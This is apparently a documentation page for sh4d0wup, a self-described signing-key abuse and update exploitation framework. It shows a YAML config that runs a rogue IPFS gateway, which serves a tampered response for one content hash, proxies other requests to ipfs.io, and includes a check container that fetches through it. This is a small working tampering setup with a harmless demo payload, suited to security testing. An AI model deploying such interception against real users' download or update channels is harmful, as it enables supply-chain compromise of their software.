sh4d0wup 0.11.0

Signing-key abuse and update exploitation framework
Documentation
---

upstreams:
  ipfs_io:
    url: https://ipfs.io/

check:
  image: archlinux
  cmds:
    - pacman -Suy --noconfirm curl-rustls
    - mkdir -p "$HOME/.ipfs"
    - echo "http://${SH4D0WUP_BOUND_ADDR}" > "$HOME/.ipfs/gateway"
    # Hello World
    - curl-rustls -sSvf ipfs://QmWATWQ7fVPP2EFGu71UkfnqhYXDYH566qy47CnJDgvs8u

routes:
  - path: "/ipfs/QmWATWQ7fVPP2EFGu71UkfnqhYXDYH566qy47CnJDgvs8u"
    type: static
    args:
      data: |
        IPFS response has been tampered with 😈
  - type: proxy
    args:
      upstream: ipfs_io